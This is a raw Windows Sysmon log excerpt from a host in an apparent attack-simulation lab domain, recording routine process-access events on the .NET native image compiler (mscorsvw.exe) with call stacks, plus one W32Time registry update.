13:46:29.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0502-00000000A301}4892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.265{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0502-00000000A301}4892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.265{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0502-00000000A301}4892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.218{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0402-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.203{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0402-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.203{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0402-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.171{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0302-00000000A301}220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.156{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0302-00000000A301}220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.156{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0302-00000000A301}220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.109{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0202-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.109{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0202-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.093{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0202-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.046{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0102-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.046{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0102-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:29.046{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0102-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:30.968{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9136-6005-0D02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:30.968{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9136-6005-0D02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:30.968{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9136-6005-0D02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:30.874{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9136-6005-0C02-00000000A301}2964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:30.874{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9136-6005-0C02-00000000A301}2964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:30.874{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9136-6005-0C02-00000000A301}2964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000006212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:46:30.656{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0x5390dfb0) 10341000x80000000000000006261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:31.969{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1B02-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.969{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1B02-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
